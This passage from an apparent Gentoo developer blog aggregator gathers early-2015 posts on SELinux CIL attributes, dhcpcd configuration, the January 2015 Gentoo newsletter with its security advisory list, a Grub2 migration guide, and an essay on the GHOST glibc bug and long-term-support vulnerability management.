Maybe that’s why AddHandler is still proposed all across the Internet:

And maybe that’s why it made its way into app-admin/eselect-php (bug #538822).

Please join the fight. Time to get AddHandler off the Internet!

I ❤ Free Software 2015-02-14 (February 15, 2015, 20:19 UTC)

I’m late. So what :)

I love Free Software!

Sven Vermeulen a.k.a. swift (homepage, bugs)
CIL and attributes (February 15, 2015, 13:49 UTC)

I keep on struggling to remember this, so let’s make a blog post out of it ;-)

When the SELinux policy is being built, recent userspace (2.4 and higher) will convert the policy into CIL language, and then build the binary policy. When the policy supports type attributes, these are of course also made available in the CIL code. For instance the admindomain attribute from the userdomain module:

...
(typeattribute admindomain)
(typeattribute userdomain)
(typeattribute unpriv_userdomain)
(typeattribute user_home_content_type)

Interfaces provided by the module are also applied. You won’t find the interface CIL code in /var/lib/selinux/mcs/active/modules though; the code at that location is already “expanded” and filled in. So for the sysadm_t domain we have:

# Equivalent of
# gen_require(`
#   attribute admindomain;
#   attribute userdomain;
# ')
# typeattribute sysadm_t admindomain;
# typeattribute sysadm_t userdomain;

(typeattributeset cil_gen_require admindomain)
(typeattributeset admindomain (sysadm_t ))
(typeattributeset cil_gen_require userdomain)
(typeattributeset userdomain (sysadm_t ))
...

However, when checking which domains use the admindomain attribute, notice the following:

~# seinfo -aadmindomain -x
ERROR: Provided attribute (admindomain) is not a valid attribute name.

But don’t panic – this has a reason: as long as there is no SELinux rule applied towards the admindomain attribute, then the SELinux policy compiler will drop the attribute from the final policy. This can be confirmed by adding a single, cosmetic rule, like so:

## allow admindomain admindomain:process sigchld;

~# seinfo -aadmindomain -x
   admindomain
      sysadm_t

So there you go. That does mean that if something previously used the attribute assignation for any decisions (like “for each domain assigned the userdomain attribute, do something”) will need to make sure that the attribute is really used in a policy rule.

February 14, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Back on-line, finally (February 14, 2015, 23:41 UTC)

The core web services of mine are finally back on-line:

My apologies that it took so long!

I took the occasion of the migration to redirect all traffic on (blog|www).hartwork.org to SSL so that people downloading some of my past Windows binaries (like Winamp plug-in installers) are no longer vulnerable to games like BDFproxy man-in-the-middle.

If you run into anything (still) broken or off-line, please drop me a mail.

Best, Sebastian

February 08, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Have dhcpcd wait before backgrounding (February 08, 2015, 14:50 UTC)

Many of my systems use DHCP for obtaining IP addresses. Even though they all receive a static IP address, it allows me to have them moved over (migrations), use TFTP boot, cloning (in case of quick testing), etc. But one of the things that was making my efforts somewhat more difficult was that the dhcpcd service continued (the dhcpcd daemon immediately went in the background) even though no IP address was received yet. Subsequent service scripts that required a working network connection failed to start then.

The solution is to configure dhcpcd to wait for an IP address. This is done through the -w option, or the waitip instruction in the dhcpcd.conf file. With that in place, the service script now waits until an IP address is assigned.

February 05, 2015

There has recently been a discussion among developers about the default choice of ffmpeg/libav in Gentoo. Until recently, libav was the default implicitly by being the first dependency of virtual/ffmpeg. Now the choice has been made explicit to libav in the portage profiles, and a news item regarding this was published.

In order to get a data point which might be useful for the discussion, I have created a poll in the forum, where Gentoo users can state their preference about the default:

https://forums.gentoo.org/viewtopic-t-1010096.html

You are welcome to vote in the poll, and if you wish also state your reasons in a comment. However, as the topic of ffmpeg/libav split has been discussed extensively already, I ask you to not restart that discussion in the forum thread.

February 03, 2015
Gentoo Monthly Newsletter: January 2015 (February 03, 2015, 22:00 UTC)

Gentoo News

Council News

One topic addressed in the January council meeting was what happens if a developer wants to join a project and contribute and sends e-mail to the  project or its lead, but noone picks up the phone or answers e-mails there… General agreement was that after applying for project membership and some waiting time without any response one should just “be bold”, add oneself to  the project and start contributing in a responsible fashion.

A second item was the policy for long-term masked packages. Since a mask message is much more visible than, say, a post-installation warning, the  decision was that packages with security vulnerabilities may remain in tree  package-masked, assuming there are no replacements for them and they have active maintainers. Naturally the mask message must clearly spell out the problems with the package.

Unofficial Gentoo Portage Git Mirror

Thanks to Sven Wegener and Michał Górny, we now have an unofficial Gentoo Portage git mirror. Below is the announcement as posted in the mailing lists

Hello, everyone.

I have the pleasure to announce that the official rsync2git mirroris up and running [1] thanks to
Sven Wegener. It is updated from rsync every 30 minutes, and can be used both to sync your local
Gentoo installs and to submit improvements via pull requests (see README [2] for some details).

At the same time, I have established the 'Git Mirror' [3] project which welcomes developers
willing to help reviewing the pull requests and helping those improvements reach
package maintainers.

For users, this means that we now have a fairly efficient syncing
method and a pull request-based workflow for submitting fixes.
The auto-synced repository can also make proxy-maint workflow easier.

For developers, this either means:

a. if you want to help us, join the team, watch the pull requests.
CC maintainers when appropriate, review, even work towards merging
the changes with approval of the maintainers,

b. if you want to support git users, just wait till we CC you and then review, help, merge :),

c. if you don't want to support git users, just ignore the repo. We'll bother you
directly after the changes are reviewed and ready :).

[1]:https://github.com/gentoo/gentoo-portage-rsync-mirror
[2]:https://github.com/gentoo/gentoo-portage-rsync-mirror#README
[3]:https://wiki.gentoo.org/wiki/Project:Git_mirror

Gentoo Developer Moves

Summary

Gentoo is made up of 246 active developers, of which 36 are currently away.
Gentoo has recruited a total of 807 developers since its inception.

Changes

  • Manuel Rüger joined the python and QA teams
  • Mikle Kolyada joined the PPC team
  • Sergey Popov joined the s390 team and left the Qt team
  • Michał Górny joined the git mirror and overlays teams
  • Mark Wright joined the mathematics and haskell teams
  • Samuel Damashek left the gentoo-keys team
  • Matt Thode left the gentoo-keys team

Additions

Portage

This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 164
Packages 17977
Ebuilds 37150
Architecture Stable Testing Total % of Packages
alpha 3538 676 4214 23.44%
amd64 10889 6598 17487 97.27%
amd64-fbsd 2 1586 1588 8.83%
arm 2681 1869 4550 25.31%
arm64 536 88 624 3.47%
hppa 3107 499 3606 20.06%
ia64 3099 694 3793 21.10%
m68k 600 125 725 4.03%
mips 1 2428 2429 13.51%
ppc 6740 2543 9283 51.64%
ppc64 4308 1064 5372 29.88%
s390 1391 424 1815 10.10%
sh 1504 558 2062 11.47%
sparc 4037 982 5019 27.92%
sparc-fbsd 0 315 315 1.75%
x86 11511 5589 17100 95.12%
x86-fbsd 0 3202 3202 17.81%

gmn-portage-stats-2015-01

Security

No GLSAs have been released on January 2015. However, since there was no GMN December 2014, we include the ones for the previous month as well.

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201412-53 app-crypt/mit-krb5 MIT Kerberos 5: User-assisted execution of arbitrary code 516334
201412-52 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 522968
201412-51 net-misc/asterisk Asterisk: Multiple vulnerabilities 530056
201412-50 net-mail/getmail getmail: Information disclosure 524684
201412-49 app-shells/fish fish: Multiple vulnerabilities 509044
201412-48 sys-apps/file file: Denial of Service 532686
201412-47 sys-cluster/torque TORQUE Resource Manager: Multiple vulnerabilities 372959
201412-46 media-libs/lcms LittleCMS: Denial of Service 479874
201412-45 dev-ruby/facter Facter: Privilege escalation 514476
201412-44 sys-apps/policycoreutils policycoreutils: Privilege escalation 509896
201412-43 app-text/mupdf MuPDF: User-assisted execution of arbitrary code 358029
201412-42 app-emulation/xen Xen: Denial of Service 523524
201412-41 net-misc/openvpn OpenVPN: Denial of Service 531308
201412-40 media-libs/flac FLAC: User-assisted execution of arbitrary code 530288
201412-39 dev-libs/openssl OpenSSL: Multiple vulnerabilities 494816
201412-38 net-misc/icecast Icecast: Multiple Vulnerabilities 529956
201412-37 app-emulation/qemu QEMU: Multiple Vulnerabilities 528922
201412-36 app-emulation/libvirt libvirt: Denial of Service 532204
201412-35 app-admin/rsyslog RSYSLOG: Denial of Service 395709
201412-34 net-misc/ntp NTP: Multiple vulnerabilities 533076
201412-33 net-dns/pdns-recursor PowerDNS Recursor: Multiple vulnerabilities 299942
201412-32 mail-mta/sendmail sendmail: Information disclosure 511760
201412-31 net-irc/znc ZNC: Denial of Service 471738
201412-30 www-servers/varnish Varnish: Multiple vulnerabilities 458888
201412-29 www-servers/tomcat Apache Tomcat: Multiple vulnerabilities 442014
201412-28 dev-ruby/rails Ruby on Rails: Multiple vulnerabilities 354249
201412-27 dev-lang/ruby Ruby: Denial of Service 355439
201412-26 net-misc/strongswan strongSwan: Multiple Vulnerabilities 507722
201412-25 dev-qt/qtgui QtGui: Denial of Service 508984
201412-24 media-libs/openjpeg OpenJPEG: Multiple vulnerabilities 484802
201412-23 net-analyzer/nagios-core Nagios: Multiple vulnerabilities 447802
201412-22 dev-python/django Django: Multiple vulnerabilities 521324
201412-21 www-apache/mod_wsgi mod_wsgi: Privilege escalation 510938
201412-20 gnustep-base/gnustep-base GNUstep Base library: Denial of Service 508370
201412-19 net-dialup/ppp PPP: Information disclosure 519650
201412-18 net-misc/freerdp FreeRDP: User-assisted execution of arbitrary code 511688
201412-17 app-text/ghostscript-gpl GPL Ghostscript: Multiple vulnerabilities 264594
201412-16 dev-db/couchdb CouchDB: Denial of Service 506354
201412-15 app-admin/mcollective MCollective: Privilege escalation 513292
201412-14 media-gfx/xfig Xfig: User-assisted execution of arbitrary code 297379
201412-13 www-client/chromium Chromium: Multiple vulnerabilities 524764
201412-12 sys-apps/dbus D-Bus: Multiple Vulnerabilities 512940
201412-11 app-emulation/emul-linux-x86-baselibs AMD64 x86 emulation base libraries: Multiple vulnerabilities 196865
201412-10 www-apps/egroupware (and 6 more) Multiple packages, Multiple vulnerabilities fixed in 2012 284536
201412-09 games-sports/racer-bin (and 24 more) Multiple packages, Multiple vulnerabilities fixed in 2011 194151
201412-08 dev-util/insight (and 26 more) Multiple packages, Multiple vulnerabilities fixed in 2010 159556
201412-07 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 530692
201412-06 dev-libs/libxml2 libxml2: Denial of Service 525656
201412-05 app-antivirus/clamav Clam AntiVirus: Denial of service 529728
201412-04 app-emulation/libvirt libvirt: Multiple vulnerabilities 483048
201412-03 net-mail/dovecot Dovecot: Denial of Service 509954
201412-02 net-fs/nfs-utils nfs-utils: Information disclosure 464636
201412-01 app-emulation/qemu QEMU: Multiple Vulnerabilities 514680

Package Removals/Additions

Removals

Package Developer Date
app-admin/rudy mrueg 01 Jan 2015
dev-ruby/attic mrueg 01 Jan 2015
dev-ruby/caesars mrueg 01 Jan 2015
dev-ruby/hexoid mrueg 01 Jan 2015
dev-ruby/gibbler mrueg 01 Jan 2015
dev-ruby/rye mrueg 01 Jan 2015
dev-ruby/storable mrueg 01 Jan 2015
dev-ruby/tryouts mrueg 01 Jan 2015
dev-ruby/sysinfo mrueg 01 Jan 2015
dev-perl/MooseX-AttributeHelpers zlogene 01 Jan 2015
dev-db/pgasync titanofold 07 Jan 2015
app-misc/cdcollect pacho 07 Jan 2015
net-im/linpopup pacho 07 Jan 2015
media-gfx/f-spot pacho 07 Jan 2015
media-gfx/truevision pacho 07 Jan 2015
dev-ruby/tmail mrueg 21 Jan 2015
dev-ruby/refe mrueg 21 Jan 2015
dev-ruby/mysql-ruby mrueg 21 Jan 2015
dev-ruby/gem_plugin mrueg 21 Jan 2015
dev-ruby/directory_watcher mrueg 21 Jan 2015
dev-ruby/awesome_nested_set mrueg 21 Jan 2015
app-emacs/cedet ulm 28 Jan 2015
app-vim/svncommand radhermit 30 Jan 2015
app-vim/cvscommand radhermit 30 Jan 2015

Additions

Package Developer Date
dev-ruby/rails-html-sanitizer graaff 01 Jan 2015
dev-ruby/rails-dom-testing graaff 01 Jan 2015
dev-ruby/rails-deprecated_sanitizer graaff 01 Jan 2015
dev-ruby/activejob graaff 01 Jan 2015
app-crypt/gkeys-gen dolsen 01 Jan 2015
dev-haskell/bencode gienah 03 Jan 2015
dev-haskell/torrent gienah 03 Jan 2015
dev-python/PyPDF2 idella4 03 Jan 2015
dev-python/tzlocal floppym 03 Jan 2015
dev-python/APScheduler floppym 03 Jan 2015
app-emacs/dts-mode ulm 03 Jan 2015
dev-python/configargparse radhermit 04 Jan 2015
dev-haskell/setlocale slyfox 04 Jan 2015
dev-haskell/hgettext slyfox 04 Jan 2015
dev-python/parsley mrueg 05 Jan 2015
dev-python/vcversioner mrueg 06 Jan 2015
dev-python/txsocksx mrueg 06 Jan 2015
media-plugins/vdr-rpihddevice hd_brummy 06 Jan 2015
net-misc/chrome-remote-desktop vapier 06 Jan 2015
app-admin/systemrescuecd-x86 mgorny 06 Jan 2015
dev-python/pgasync titanofold 07 Jan 2015
net-proxy/shadowsocks-libev dlan 08 Jan 2015
net-misc/i2pd blueness 08 Jan 2015
games-misc/exult-sound mr_bones_ 09 Jan 2015
kde-frameworks/kpackage mrueg 09 Jan 2015
kde-frameworks/networkmanager-qt mrueg 09 Jan 2015
games-puzzle/ksokoban bircoph 10 Jan 2015
dev-cpp/lucene++ johu 10 Jan 2015
app-emacs/multi-term ulm 10 Jan 2015
dev-java/xml-security ercpe 11 Jan 2015
dev-libs/libtreadstone patrick 13 Jan 2015
dev-libs/utfcpp yac 13 Jan 2015
net-print/epson-inkjet-printer-escpr floppym 15 Jan 2015
dev-cpp/websocketpp johu 16 Jan 2015
sys-apps/systemd-readahead pacho 17 Jan 2015
dev-util/radare2 slyfox 18 Jan 2015
dev-python/wcsaxes xarthisius 18 Jan 2015
net-analyzer/apinger jer 19 Jan 2015
dev-lang/go-bootstrap williamh 20 Jan 2015
media-plugins/vdr-satip hd_brummy 20 Jan 2015
dev-perl/Data-Types chainsaw 20 Jan 2015
dev-perl/DateTime-Tiny chainsaw 20 Jan 2015
dev-perl/MongoDB chainsaw 20 Jan 2015
dev-python/paramunittest alunduil 21 Jan 2015
dev-python/mando alunduil 21 Jan 2015
dev-python/radon alunduil 21 Jan 2015
sci-geosciences/opencpn-plugin-br24radar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-climatology mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-launcher mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-logbookkonni mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-objsearch mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-ocpndebugger mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-statusbar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weatherfax mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weather_routing mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-wmm mschiff 21 Jan 2015
dev-python/elasticsearch-py vapier 22 Jan 2015
dev-php/ming-php grknight 22 Jan 2015
app-portage/cpuinfo2cpuflags mgorny 23 Jan 2015
dev-ruby/spy mrueg 24 Jan 2015
dev-ruby/power_assert graaff 25 Jan 2015
dev-ruby/vcr graaff 25 Jan 2015
dev-util/trace-cmd chutzpah 27 Jan 2015
net-libs/iojs patrick 27 Jan 2015
dev-python/bleach radhermit 27 Jan 2015
dev-python/readme radhermit 27 Jan 2015
www-client/vivaldi jer 27 Jan 2015
media-libs/libpagemaker jlec 27 Jan 2015
dev-python/jenkinsapi idella4 28 Jan 2015
dev-python/httmock idella4 28 Jan 2015
dev-python/jenkins-webapi idella4 29 Jan 2015
sec-policy/selinux-git perfinion 29 Jan 2015
x11-drivers/xf86-video-opentegra chithanh 29 Jan 2015
dev-java/cssparser monsieurp 30 Jan 2015
app-emulation/docker-compose alunduil 31 Jan 2015
dev-python/oslo-context prometheanfire 31 Jan 2015
dev-python/oslo-middleware prometheanfire 31 Jan 2015
dev-haskell/tasty-kat qnikst 31 Jan 2015
dev-perl/Monitoring-Plugin mjo 31 Jan 2015

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 January 2015 and 31 January 2015. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2015-01

Bug Activity Number
New 2113
Closed 1058
Not fixed 182
Duplicates 150
Total 6525
Blocker 3
Critical 16
Major 62

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Perl team 66
2 Gentoo Linux Gnome Desktop Team 66
3 Python Gentoo Team 44
4 Gentoo Games 42
5 Gentoo KDE team 34
6 Default Assignee for Orphaned Packages 27
7 Gentoo's Haskell Language team 26
8 Gentoo Security 22
9 Gentoo Ruby Team 22
10 Others 708

gmn-closed-2015-01

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Security 106
2 Gentoo Linux bug wranglers 103
3 Gentoo Perl team 72
4 Gentoo Games 72
5 Python Gentoo Team 66
6 Gentoo Linux Gnome Desktop Team 66
7 Gentoo's Haskell Language team 65
8 Default Assignee for Orphaned Packages 54
9 Java team 53
10 Others 1455

gmn-opened-2015-01

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

February 02, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Mozilla: Hating you so you don't have to (February 02, 2015, 02:33 UTC)

Ahem. I'm mildly amused, Firefox 35 shows me this nice little informational message in the "Get addons" view:

Secure Connection Failed

An error occurred during a connection to services.addons.mozilla.org. 
Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate) 
Oh well. Why I was looking at that anyway? Well, for some reasons I've had adb (android thingy) running on my desktop. Which makes little sense ... but ... find tells me:
./.mozilla/firefox/badrandomvalue.default/extensions/adbhelper@mozilla.org/linux64/adb
So now there's a random service running *when I start firefox* because ...


err, I might want to " test, deploy and debug HTML5 web apps on Firefox OS phones & Simulator, directly from Firefox browser. "
Which I don't. But I appreciate having extra crap default-enabled for no reason. Sigh.

Mozilla: We hate you so you don't have to

January 31, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Choice included (January 31, 2015, 17:35 UTC)

Some time ago, Matteo Pescarin created the great "Gentoo Abducted" design. Here are, after some minor doodling for the fun of it, several A0 posters based on that design, pointing out the excellent features of Gentoo. Released under CC BY-SA 2.5 as the original. Enjoy!



PDF SVG


PDF SVG


PDF SVG


PDF SVG


PDF SVG

Sebastian Pipping a.k.a. sping (homepage, bugs)
Switching to Grub2 on Gentoo (January 31, 2015, 17:26 UTC)

Hi!

There seem to be quite a number of people being “afraid” of Grub2, because of the “no single file” approach. From more people, I hear about sticking to Grub legacy or moving to syslinux, rather than upgrading to Grub2.

I used to be one of those not too long ago: I’ve been sticking to Grub legacy for quite a while, mainly because I never felt like breaking a booting system at that very moment. I have finally upgraded my Gentoo dev machine to Grub2 now and I’m rather happy with the results:

  • No manual editing of Grug2 config files for kernel upgrades any more
  • The Grub2 rescue shell, if I should break things
  • Fancy theming if I feel like that next week
  • I am off more or less unmaintained software

My steps to upgrade were:

1. Install sys-boot/grub:2.

2. Inspect the output of “sudo grub2-mkconfig” (which goes to stdout) to get a feeling for it.

3. Tune /etc/default/grub a bit:

GRUB_DEFAULT=0
GRUB_TIMEOUT=5

# This is genkernel
GRUB_CMDLINE_LINUX="dolvm dokeymap keymap=de
    crypt_root=UUID=00000000-0000-0000-0000-000000000000
    real_root=/dev/gentoo/root noslowusb"

# A bit retro, works with and without external display
GRUB_GFXMODE=640x480

GRUB_BACKGROUND="/boot/grub/gentoo-cow-gdm-remake-640x480.png"

NOTE: I broke the GRUB_CMDLINE_LINUX line for readability, only.

4. Insert a “shutdown” menu entry at /etc/grub.d/40_custom:

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.

menuentry "Shutdown" {
        halt
}

5. Run “sudo grub2-mkconfig -o /boot/grub/grub.cfg“.

6. Run “sudo grub2-install /dev/disk/by-id/ata-HITACHI_000000000000000_00000000000000000000“.

Using /dev/disk/ greatly reduces the risk of installing to the wrong disk.
Check “find /dev/disk | xargs ls -ld“.

7. Reboot

Done.

For kernel updates, my new process is

emerge -auv sys-kernel/vanilla-sources

pushd /usr/src
cp linux-3.18.3/.config linux-3.18.4/

# yes, sys-kernel/vanilla-sources[symlink] would do that for me
rm linux
ln -s linux-3.18.4 linux

pushd linux
yes '' | make oldconfig

make -j4 && make modules_install install \
		&& emerge tp_smapi \
		&& genkernel initramfs \
		&& grub2-mkconfig -o /boot/grub/grub.cfg

popd
popd

Best, Sebastian

January 29, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

GHOSTOn Tuesday details about the security vulnerability GHOST in Glibc were published by the company Qualys. When severe security vulnerabilities hit the news I always like to take this as a chance to learn what can be improved and how to avoid similar incidents in the future (see e. g. my posts on Heartbleed/Shellshock, POODLE/BERserk and NTP lately).

GHOST itself is a Heap Overflow in the name resolution function of the Glibc. The Glibc is the standard C library on Linux systems, almost every software that runs on a Linux system uses it. It is somewhat unclear right now how serious GHOST really is. A lot of software uses the affected function gethostbyname(), but a lot of conditions have to be met to make this vulnerability exploitable. Right now the most relevant attack is against the mail server exim where Qualys has developed a working exploit which they plan to release soon. There have been speculations whether GHOST might be exploitable through Wordpress, which would make it much more serious.

Technically GHOST is a heap overflow, which is a very common bug in C programming. C is inherently prone to these kinds of memory corruption errors and there are essentially two things here to move forwards: Improve the use of exploit mitigation techniques like ASLR and create new ones (levee is an interesting project, watch this 31C3 talk). And if possible move away from C altogether and develop core components in memory safe languages (I have high hopes for the Mozilla Servo project, watch this linux.conf.au talk).

GHOST was discovered three times

But the thing I want to elaborate here is something different about GHOST: It turns out that it has been discovered independently three times. It was already fixed in 2013 in the Glibc Code itself. The commit message didn't indicate that it was a security vulnerability. Then in early 2014 developers at Google found it again using Address Sanitizer (which – by the way – tells you that all software developers should use Address Sanitizer more often to test their software). Google fixed it in Chrome OS and explicitly called it an overflow and a vulnerability. And then recently Qualys found it again and made it public.

Now you may wonder why a vulnerability fixed in 2013 made headlines in 2015. The reason is that it widely wasn't fixed because it wasn't publicly known that it was serious. I don't think there was any malicious intent. The original Glibc fix was probably done without anyone noticing that it is serious and the Google devs may have thought that the fix is already public, so they don't need to make any noise about it. But we can clearly see that something doesn't work here. Which brings us to a discussion how the Linux and free software world in general and vulnerability management in particular work.

The “Never touch a running system” principle

Quite early when I came in contact with computers I heard the phrase “Never touch a running system”. This may have been a reasonable approach to IT systems back then when computers usually weren't connected to any networks and when remote exploits weren't a thing, but it certainly isn't a good idea today in a world where almost every computer is part of the Internet. Because once new security vulnerabilities become public you should change your system and fix them. However that doesn't change the fact that many people still operate like that.

A number of Linux distributions provide “stable” or “Long Time Support” versions. Basically the idea is this: At some point they take the current state of their systems and further updates will only contain important fixes and security updates. They guarantee to fix security vulnerabilities for a certain time frame. This is kind of a compromise between the “Never touch a running system” approach and reasonable security. It tries to give you a system that will basically stay the same, but you get fixes for security issues. Popular examples for this approach are the stable branch of Debian, Ubuntu LTS versions and the Enterprise versions of Red Hat and SUSE.

To give you an idea about time frames, Debian currently supports the stable trees Squeeze (6.0) which was released 2011 and Wheezy (7.0) which was released 2013. Red Hat Enterprise Linux has currently 4 supported version (4, 5, 6, 7), the oldest one was originally released in 2005. So we're talking about pretty long time frames that these systems get supported. Ubuntu and Suse have similar long time supported Systems.

These systems are delivered with an implicit promise: We will take care of security and if you update regularly you'll have a system that doesn't change much, but that will be secure against know threats. Now the interesting question is: How well do these systems deliver on that promise and how hard is that?

Vulnerability management is chaotic and fragile

I'm not sure how many people are aware how vulnerability management works in the free software world. It is a pretty fragile and chaotic process. There is no standard way things work. The information is scattered around many different places. Different people look for vulnerabilities for different reasons. Some are developers of the respective projects themselves, some are companies like Google that make use of free software projects, some are just curious people interested in IT security or researchers. They report a bug through the channels of the respective project. That may be a mailing list, a bug tracker or just a direct mail to the developer. Hopefully the developers fix the issue. It does happen that the person finding the vulnerability first has to explain to the developer why it actually is a vulnerability. Sometimes the fix will happen in a public code repository, sometimes not. Sometimes the developer will mention that it is a vulnerability in the commit message or the release notes of the new version, sometimes not. There are notorious projects that refuse to handle security vulnerabilities in a transparent way. Sometimes whoever found the vulnerability will post more information on his/her blog or on a mailing list like full disclosure or oss-security. Sometimes not. Sometimes vulnerabilities get a CVE id assigned, sometimes not.

Add to that the fact that in many cases it's far from clear what is a security vulnerability. It is absolutely common that if you ask the people involved whether this is serious the best and most honest answer they can give is “we don't know”. And very often bugs get fixed without anyone noticing that it even could be a security vulnerability.

Then there are projects where the number of security vulnerabilities found and fixed is really huge. The latest Chrome 40 release had 62 security fixes, version 39 had 42. Chrome releases a new version every two months. Browser vulnerabilities are found and fixed on a daily basis. Not that extreme but still high is the vulnerability count in PHP, which is especially worrying if you know that many webhosting providers run PHP versions not supported any more.

So you probably see my point: There is a very chaotic stream of information in various different places about bugs and vulnerabilities in free software projects. The number of vulnerabilities is huge. Making a promise that you will scan all this information for security vulnerabilities and backport the patches to your operating system is a big promise. And I doubt anyone can fulfill that.

GHOST is a single example, so you might ask how often these things happen. At some point right after GHOST became public this excerpt from the Debian Glibc changelog caught my attention (excuse the bad quality, had to take the image from Twitter because I was unable to find that changelog on Debian's webpages):

eglibc Changelog

What you can see here: While Debian fixed GHOST (which is CVE-2015-0235) they also fixed CVE-2012-6656 – a security issue from 2012. Admittedly this is a minor issue, but it's a vulnerability nevertheless. A quick look at the Debian changelog of Chromium both in squeeze and wheezy will tell you that they aren't fixing all the recent security issues in it. (Debian already had discussions about removing Chromium and in Wheezy they don't stick to a single version.)

It would be an interesting (and time consuming) project to take a package like PHP and check for all the security vulnerabilities whether they are fixed in the latest packages in Debian Squeeze/Wheezy, all Red Hat Enterprise versions and other long term support systems. PHP is probably more interesting than browsers, because the high profile targets for these vulnerabilities are servers. What worries me: I'm pretty sure some people already do that. They just won't tell you and me, instead they'll write their exploits and sell them to repressive governments or botnet operators.

Then there are also stories like this: Tavis Ormandy reported a security issue in Glibc in 2012 and the people from Google's Project Zero went to great lengths to show that it is actually exploitable. Reading the Glibc bug report you can learn that this was already reported in 2005(!), just nobody noticed back then that it was a security issue and it was minor enough that nobody cared to fix it.

There are also bugs that require changes so big that backporting them is essentially impossible. In the TLS world a lot of protocol bugs have been highlighted in recent years. Take Lucky Thirteen for example. It is a timing sidechannel in the way the TLS protocol combines the CBC encryption, padding and authentication. I like to mention this bug because I like to quote it as the TLS bug that was already mentioned in the specification (RFC 5246, page 23: "This leaves a small timing channel"). The real fix for Lucky Thirteen is not to use the erratic CBC mode any more and switch to authenticated encryption modes which are part of TLS 1.2. (There's another possible fix which is using Encrypt-then-MAC, but it is hardly deployed.) Up until recently most encryption libraries didn't support TLS 1.2. Debian Squeeze and Red Hat Enterprise 5 ship OpenSSL versions that only support TLS 1.0. There is no trivial patch that could be backported, because this is a huge change. What they likely backported are workarounds that avoid the timing channel. This will stop the attack, but it is not a very good fix, because it keeps the problematic old protocol and will force others to stay compatible with it.

LTS and stable distributions are there for a reason

The big question is of course what to do about it. OpenBSD developer Ted Unangst wrote a blog post yesterday titled Long term support considered harmful, I suggest you read it. He argues that we should get rid of long term support completely and urge users to upgrade more often. OpenBSD has a 6 month release cycle and supports two releases, so one version gets supported for one year.

Given what I wrote before you may think that I agree with him, but I don't. While I personally always avoided to use too old systems – I 'm usually using Gentoo which doesn't have any snapshot releases at all and does rolling releases – I can see the value in long term support releases. There are a lot of systems out there – connected to the Internet – that are never updated. Taking away the option to install systems and let them run with relatively little maintenance overhead over several years will probably result in more systems never receiving any security updates. With all its imperfectness running a Debian Squeeze with the latest updates is certainly better than running an operating system from 2011 that stopped getting security fixes in 2012.

Improving the information flow

I don't think there is a silver bullet solution, but I think there are things we can do to improve the situation. What could be done is to coordinate and share the work. Debian, Red Hat and other distributions with stable/LTS versions could agree that their next versions are based on a specific Glibc version and they collaboratively work on providing patch sets to fix all the vulnerabilities in it. This already somehow happens with upstream projects providing long term support versions, the Linux kernel does that for example. Doing that at scale would require vast organizational changes in the Linux distributions. They would have to agree on a roughly common timescale to start their stable versions.

What I'd consider the most crucial thing is to improve and streamline the information flow about vulnerabilities. When Google fixes a vulnerability in Chrome OS they should make sure this information is shared with other Linux distributions and the public. And they should know where and how they should share this information.

One mechanism that tries to organize the vulnerability process is the system of CVE ids. The idea is actually simple: Publicly known vulnerabilities get a fixed id and they are in a public database. GHOST is CVE-2015-0235 (the scheme will soon change because four digits aren't enough for all the vulnerabilities we find every year). I got my first CVEs assigned in 2007, so I have some experiences with the CVE system and they are rather mixed. Sometimes I briefly mention rather minor issues in a mailing list thread and a CVE gets assigned right away. Sometimes I explicitly ask for CVE assignments and never get an answer.

I would like to see that we just assign CVEs for everything that even remotely looks like a security vulnerability. However right now I think the process is to unreliable to deliver that. There are other public vulnerability databases like OSVDB, I have limited experience with them, so I can't judge if they'd be better suited. Unfortunately sometimes people hesitate to request CVE ids because others abuse the CVE system to count assigned CVEs and use this as a metric how secure a product is. Such bad statistics are outright dangerous, because it gives people an incentive to downplay vulnerabilities or withhold information about them.

This post was partly inspired by some discussions on oss-security

Michal Hrusecky a.k.a. miska (homepage, bugs)
Introducing ZXDB (January 29, 2015, 07:23 UTC)

Lately I have been playing a lot with some cool technologies. I had a lot of fun, so I want to share some of it and at least point you to the interesting pieces of technology to check out. And it also inspired me to my new project which I would like to introduce with this blog post.

ZeroMQ & friends

Lets start with ZeroMQ. It is lightweight messaging library with really nice API. And the tools around it? CZMQ brings even nicer API and there is also zproto which let’s you generate protocol handling code and even state machines easily. You just describe it and zproto will generate all the code for you. I know that you might think that code generation is evil. And quite some time it is. But this one is not :-) Generated code is nice, readable and it really helps with productivity. You don’t have to write copy&paste code and drown yourself in writing stuff that was written thousand times before already. You can concentrate on the logic of your application – the only important part – and disregard all those irrelevant boring processing functions. So ZeroMQ in combination with zproto is one of the interesting stuff I’ve been playing with lately. And I would recommend you to do so as well :-)

TNT

